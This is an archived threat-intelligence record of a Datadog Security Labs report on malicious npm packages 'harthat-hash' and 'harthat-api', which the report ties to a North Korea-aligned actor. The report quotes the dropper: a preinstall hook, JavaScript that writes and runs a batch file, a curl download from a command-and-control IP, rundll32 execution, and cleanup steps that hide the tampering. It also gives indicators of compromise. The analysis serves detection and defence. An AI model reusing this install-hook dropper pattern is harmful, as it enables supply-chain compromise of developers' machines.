{ "id": "954a07cb-94aa-4660-8e3b-d472b97c673b", "created_at": "2026-04-06T00:16:43.980428Z", "updated_at": "2026-04-10T13:12:19.880969Z", "deleted_at": null, "sha1_hash": "0e468821dad11cb368d401b76405e0a6b0f390a6", "title": "Stressed Pungsan: DPRK-aligned threat actor leverages npm for initial access | Datadog Security Labs", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 765893, "plain_text": "Stressed Pungsan: DPRK-aligned threat actor leverages npm for\r\ninitial access | Datadog Security Labs\r\nBy Sebastian Obregoso, Zack Allen, Datadog Security Research Team\r\nPublished: 2024-07-31 · Archived: 2026-04-05 14:25:59 UTC\r\nKey Points and Observations\r\nOn July 7, 2024, npm user nagasiren978 published two malicious packages to the npm registry on\r\nnpmjs.org.\r\nThese packages, \"harthat-hash\" and \"harthat-api\", contain malicious code that installs additional malicious\r\nsoftware from a command and control (C2) server.\r\nThis C2 server mostly served malicious batch scripts and one DLL, indicating a victim target set of\r\nWindows.\r\nThe tactics, techniques, and procedures (TTPs) behind the malicious packages, C2 infrastructure, and\r\ntargeting sets align closely with what Microsoft calls MOONSTONE SLEET, an actor aligned with the\r\nDemocratic People’s Republic of Korea (DPRK, also referred to as North Korea).\r\nWe internally name this cluster Stressed Pungsan. (We align nation-state threat actor clusters with their\r\nnational breeds, and the Pungsan is a dog native to North Korea.)\r\nBackground\r\nThe Datadog Security Research team continuously tracks how threat actors abuse the software supply chain\r\necosystem to distribute malware and gain footholds into developer and cloud environments. Once access is\r\nestablished, these threat actors perform several actions on objective, including stealing personal information, API\r\nand cloud access keys, and perform lateral movement into other environments.\r\nTo help combat this threat, we’ve developed scalable package-scanning infrastructure within PyPi and npm\r\nleveraging our open-source GuardDog software. During regular scanning and triage operations, we discovered\r\ntwo packages that share infrastructure, tactics, techniques \u0026 procedures with the Democratic People’s Republic of\r\nKorea (DPRK) aligned actors.\r\nIn particular, this cluster, which we named “Stressed Pungsan”, aligns closest with what Microsoft calls\r\nMOONSTONE SLEET.\r\nhttps://securitylabs.datadoghq.com/articles/stressed-pungsan-dprk-aligned-threat-actor-leverages-npm-for-initial-access/\r\nPage 1 of 8\n\nAttack Flow (click to enlarge)\r\nThe initial lead\r\nAs a part of our continuous effort to ensure that software from npm and PyPI ecosystems is safe to use, we\r\ndiscovered two samples published in npm on Jul 7, 2024.\r\nharthat-hash v1.3.3 (published on July 7, 2024 at 16:19 UTC)\r\nharthat-api v1.3.1 (published on July 7, 2024 at 15:59 UTC)\r\nWe noticed three odd behaviors in these two packages.\r\nFirst, our detection rule npm-install-script shows it leverages the pre-install script in the package.json to execute a\r\n.js file and delete it.\r\nnpm-install-script: found 1 source code matches\r\n * The package.json has a script automatically running when the package is installed at harthat-hash-1.3.3/pack\r\n \"preinstall\": \"node deference.js \u0026\u0026 del deference.js\",\r\nSecondly, the shady-links rule detects a suspicious link being requested. However, the same line also shows that a\r\npayload is being downloaded.\r\nshady-links: found 1 source code matches\r\n * This package contains an URL to a domain with a suspicious extension at harthat-hash-1.3.3/package/deference\r\n const data = '@echo off\\ncurl -o Temp.b -L \"http://142.111.77.196/user/user.asp?id=237596\" \u003e nul 2\u003e\u00261\\nr\r\nhttps://securitylabs.datadoghq.com/articles/stressed-pungsan-dprk-aligned-threat-actor-leverages-npm-for-initial-access/\r\nPage 2 of 8\n\nFinally, the npm-dll-hijacking rule identifies that the mentioned downloaded payload is a DLL loaded into\r\nmemory using the rundll32.exe binary.\r\nnpm-dll-hijacking: found 1 source code matches\r\n * This package manipulates a trusted application into loading a malicious DLL at harthat-hash-1.3.3/package/de\r\n const data = '@echo off\\ncurl -o Temp.b -L \"http://142.111.77.196/user/user.asp?id=237596\" \u003e nul 2\u003e\u00261\\nr\r\nThese two packages are almost identical, the only difference being the value of id parameter, as indicated below.\r\nharthat-hash-1.3.3: http://142.111.77.196/user/user.asp?id=237596\r\nharthat-api-1.3.1: http://142.111.77.196/user/user.asp?id=G6A822B\r\nDuplicating legitimate code\r\nWhile the name resembles the Hardhat npm package (an Ethereum development utility), its content does not\r\nindicate any intention to typosquat it. The malicious package reuses code from a well-known GitHub repository\r\ncalled node-config with over 6,000 stars and 500 forks, known in npm as config. Both packages make use of the\r\ncode version tag v3.3.9, dated to two years ago (regardless of the version shown next), which is nearly identical\r\nexcept for the modifications shown below:\r\n--- harthat-api-1.3.1/package/package.json\r\n+++ node-config/package.json\r\n@@ -1,6 +1,6 @@\r\n {\r\n- \"name\": \"harthat-api\",\r\n- \"version\": \"1.3.1\",\r\n+ \"name\": \"config\",\r\n+ \"version\": \"3.3.8\",\r\n \"main\": \"./lib/config.js\",\r\n \"description\": \"Configuration control for production node deployments\",\r\n \"author\": \"Loren West \u003copen_source@lorenwest.com\u003e\",\r\n@@ -47,7 +47,6 @@\r\n \"node\": \"\u003e= 10.0.0\"\r\n },\r\n \"scripts\": {\r\n- \"preinstall\": \"node deference.js \u0026\u0026 del deference.js\",\r\n \"test\": \"./node_modules/vows/bin/vows test/*.js --spec\"\r\n }\r\n }\r\nhttps://securitylabs.datadoghq.com/articles/stressed-pungsan-dprk-aligned-threat-actor-leverages-npm-for-initial-access/\r\nPage 3 of 8\n\nOnly in harthat-api-1.3.1/package: deference.js\r\nOnly in harthat-api-1.3.1/package: pk.json\r\nIn the following sections we will dive into the details of the deference.js and pk.json files.\r\nPackage analysis\r\nThe preinstall script runs deference.js file that contains the following excerpt of code:\r\nconst data = '@echo off\\ncurl -o Temp.b -L \"http://142.111.77.196/user/user.asp?id=G6A822B\" \u003e nul 2\u003e\u00261\\nrename\r\nif (osType === 'Windows_NT') {\r\n const fileName = 'package.bat';\r\n fs.writeFile(fileName, data, (err) =\u003e {\r\n if (!err) {\r\n if (!err) {\r\n const child = exec(`\"${fileName}\"`, (error, stdout, stderr) =\u003e {\r\n if (error) {\r\n return;\r\n }\r\n if (stderr) {\r\n return;\r\n }\r\n fs.unlink(fileName, (err) =\u003e {\r\n });\r\n });\r\n }\r\n }\r\n });\r\n}\r\nThis piece creates a file called package.bat with the content of the data variable and executes it.\r\nBreaking down the contents of this variable, the threat actor uses curl, a command line tool installed on many\r\nsystems that allow making HTTP requests, to retrieve a file called Temp.b .\r\ncurl -o Temp.b -L \"http://142.111.77.196/user/user.asp?id=G6A822B\" \u003e nul 2\u003e\u00261\r\nThe script then renames the file to package.db , which turns out to be a Windows Dynamically Linked Library\r\n(DLL).\r\nrename Temp.b package.db \u003e nul 2\u003e\u00261\r\nhttps://securitylabs.datadoghq.com/articles/stressed-pungsan-dprk-aligned-threat-actor-leverages-npm-for-initial-access/\r\nPage 4 of 8\n\nNext, the threat actor makes use of the run32dll.exe executable to load this DLL and execute its code. This\r\ntechnique is known as “System Binary Proxy Execution: Rundll32” and aims to evade system defenses by using\r\nthe rundll32 system trusted binary, which allows a threat actor to run arbitrary DLLs.\r\nrundll32 package.db,GenerateKey 1234\r\nAfter the payload execution concludes, the script deletes the .js file and replaces the package.json file with\r\npk.json , which contains the original content of node-config project.\r\ndel \"package.db\"\r\nif exist \"pk.json\"\r\n(\r\ndel \"package.json\" \u003e nul 2\u003e\u00261\r\nrename \"pk.json\" \"package.json\" \u003e nul 2\u003e\u00261\r\n)\r\nThis variable we examined is then written to a .bat file called 'package.bat' and executed only if it is running on a\r\nWindows system.\r\nThe malicious DLL file\r\nIn previous campaigns from this threat actor, code within the dropper scripts perform a simple XOR decoding\r\nroutine to decode this binary. In the campaign we analyzed this technique was absent, and the DLL was instead\r\ndelivered without obfuscation.\r\nThe DLL exports two functions: GenerateKey and its assumed unicode-compatible equivalent GenerateKeyW .\r\nStatic analysis shows that the malware author opted to write code for GenerateKeyW , suggesting that they expect\r\nall input to be unicode. At the dropper stage, we can see the command to call the exported function GenerateKey\r\nwith an argument of 1234 .\r\nList of Exported functions from IDA Pro (click to enlarge)\r\nInitial static analysis of the DLL revealed Windows API calls to suspicious functions like IsDebuggerPresent ,\r\nGetTickCount , and GetActiveWindow , which are frequently used for anti-debugging and anti-reverse\r\nengineering purposes. Closer inspection shows that the developer has opted to statically link the Microsoft C\r\nruntime (CRT), within which are benign library functions that make the aforementioned Windows API calls. This\r\nis a simple technique to ensure portability of the DLL, effectively allowing it to execute on a broader range of\r\ntarget systems. More information about this technique can be found in CaptMeelo's blog post. This also explains\r\nwhy the DLL isn’t currently detected by any vendors on VirusTotal, despite having these suspicious API calls.\r\nhttps://securitylabs.datadoghq.com/articles/stressed-pungsan-dprk-aligned-threat-actor-leverages-npm-for-initial-access/\r\nPage 5 of 8\n\nObserving the exported functions allowed us to focus our analysis on GenerateKeyW . After identifying the\r\nfunction itself, we noticed that it does not seem to contain any malicious code. The only code present was a call to\r\nreturn, essentially exiting the function shortly after it’s called.\r\nDisassembly showing contents of GenerateKeyW (click to enlarge)\r\nAfter discovering this lack of functionality, we expected that the DLL must be self-modifying and that the\r\nGenerateKeyW function would be populated with malicious logic during runtime. We conducted additional static\r\nanalysis in the hope that this would lead us to hidden logic within the DLL, but this effort was unsuccessful.\r\nWe also conducted dynamic analysis of the DLL, both in a debugger and on the host itself, in the hope that we\r\nwould observe some malicious behaviours. We saw no evidence of the code modifying itself at runtime, and\r\ntraditional dynamic analysis techniques did not reveal any additional malicious behavior.\r\nThis led us to the conclusion that the DLL must be not weaponized and that the threat actor is either testing their\r\ncommand-and-control (C2) or payload delivery infrastructure, or they have mistakenly pushed out an unfinished\r\nversion.\r\nReusing fake-authors\r\nBoth packages were published by the same author, who removed the package after a few hours of publishing it.\r\nThis methodology is sometimes used by this threat actor and seems to allow them to publish faster and avoid\r\nbeing blocked in the package manager site.\r\nNPM Author(click to enlarge)\r\nHow can Datadog help\r\nhttps://securitylabs.datadoghq.com/articles/stressed-pungsan-dprk-aligned-threat-actor-leverages-npm-for-initial-access/\r\nPage 6 of 8\n\nDatadog Software Composition Analysis (SCA) customers can easily verify if this package is installed in their\r\ninfrastructure by running this query in the Library Risk explorer: library_name:(harthat-api OR harthat-hash)\r\nStatus:Open\r\nSCA finding (click to enlarge)\r\nIf you discover your system is impacted, consider what credentials and underlying infrastructure could be\r\naffected. It is important to take immediate measures such as rotating credentials, isolating the application, and\r\ninvestigating potential spread.\r\nWe also published the packages to our malicious package dataset, linked below, which is leveraged by OpenSSF\r\nand is generated into OSV feeds to check your infrastructure for infection.\r\nConclusion\r\nThreat actors are increasingly turning to malicious npm packages as a way to compromise targets. This tactic is\r\nsteadily on the rise, with threat actors often smuggling malicious code within seemingly legitimate packages that\r\ncopy existing content. The package's short presence in the index suggests the threat actor may have pulled it\r\nthemself, possibly achieving their goal.\r\nIndicators of Compromise\r\nhttps://securitylabs.datadoghq.com/articles/stressed-pungsan-dprk-aligned-threat-actor-leverages-npm-for-initial-access/\r\nPage 7 of 8\n\nIP Addresses Purpose\r\n142.111.77[.]196 Download of malicious payload\r\nFilename SHA256\r\nFirst Seen\r\nDate\r\nTemp.b (also\r\nknown as\r\npackage.db)\r\nd2a74db6b9c900ad29a81432af72eee8ed4e22bf61055e7e8f7a5f1a33778277\r\n2024-07-\r\n03\r\n05:57:16\r\nUTC\r\nSource: https://securitylabs.datadoghq.com/articles/stressed-pungsan-dprk-aligned-threat-actor-leverages-npm-for-initial-access/\r\nhttps://securitylabs.datadoghq.com/articles/stressed-pungsan-dprk-aligned-threat-actor-leverages-npm-for-initial-access/\r\nPage 8 of 8", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA" ], "origins": [ "web" ], "references": [ "https://securitylabs.datadoghq.com/articles/stressed-pungsan-dprk-aligned-threat-actor-leverages-npm-for-initial-access/" ], "report_names": [ "stressed-pungsan-dprk-aligned-threat-actor-leverages-npm-for-initial-access" ], "threat_actors": [ { "id": "d90307b6-14a9-4d0b-9156-89e453d6eb13", "created_at": "2022-10-25T16:07:23.773944Z", "updated_at": "2026-04-10T02:00:04.746188Z", "deleted_at": null, "main_name": "Lead", "aliases": [ "Casper", "TG-3279" ], "source_name": "ETDA:Lead", "tools": [ "Agentemis", "BleDoor", "Cobalt Strike", "CobaltStrike", "RbDoor", "RibDoor", "Winnti", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "aa73cd6a-868c-4ae4-a5b2-7cb2c5ad1e9d", "created_at": "2022-10-25T16:07:24.139848Z", "updated_at": "2026-04-10T02:00:04.878798Z", "deleted_at": null, "main_name": "Safe", "aliases": [], "source_name": "ETDA:Safe", "tools": [ "DebugView", "LZ77", "OpenDoc", "SafeDisk", "TypeConfig", "UPXShell", "UsbDoc", "UsbExe" ], "source_id": "ETDA", "reports": null }, { "id": "45e6e2b3-43fe-44cd-8025-aea18a7f488f", "created_at": "2024-06-20T02:02:09.897489Z", "updated_at": "2026-04-10T02:00:04.769917Z", "deleted_at": null, "main_name": "Moonstone Sleet", "aliases": [ "Storm-1789", "Stressed Pungsan" ], "source_name": "ETDA:Moonstone Sleet", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "28523c53-1944-4ff0-bbdc-89b06e4e3c84", "created_at": "2024-11-01T02:00:52.752463Z", "updated_at": "2026-04-10T02:00:05.359782Z", "deleted_at": null, "main_name": "Moonstone Sleet", "aliases": [ "Moonstone Sleet", "Storm-1789" ], "source_name": "MITRE:Moonstone Sleet", "tools": [ "Qilin" ], "source_id": "MITRE", "reports": null }, { "id": "a2b92056-9378-4749-926b-7e10c4500dac", "created_at": "2023-01-06T13:46:38.430595Z", "updated_at": "2026-04-10T02:00:02.971571Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Operation DarkSeoul", "Bureau 121", "Group 77", "APT38", "NICKEL GLADSTONE", "G0082", "COPERNICIUM", "Moonstone Sleet", "Operation GhostSecret", "APT 38", "Appleworm", "Unit 121", "ATK3", "G0032", "ATK117", "NewRomanic Cyber Army Team", "Nickel Academy", "Sapphire Sleet", "Lazarus group", "Hastati Group", "Subgroup: Bluenoroff", "Operation Troy", "Black Artemis", "Dark Seoul", "Andariel", "Labyrinth Chollima", "Operation AppleJeus", "COVELLITE", "Citrine Sleet", "DEV-0139", "DEV-1222", "Hidden Cobra", "Bluenoroff", "Stardust Chollima", "Whois Hacking Team", "Diamond Sleet", "TA404", "BeagleBoyz", "APT-C-26" ], "source_name": "MISPGALAXY:Lazarus Group", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434603, "ts_updated_at": 1775826739, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/0e468821dad11cb368d401b76405e0a6b0f390a6.pdf", "text": "https://archive.orkl.eu/0e468821dad11cb368d401b76405e0a6b0f390a6.txt", "img": "https://archive.orkl.eu/0e468821dad11cb368d401b76405e0a6b0f390a6.jpg" } }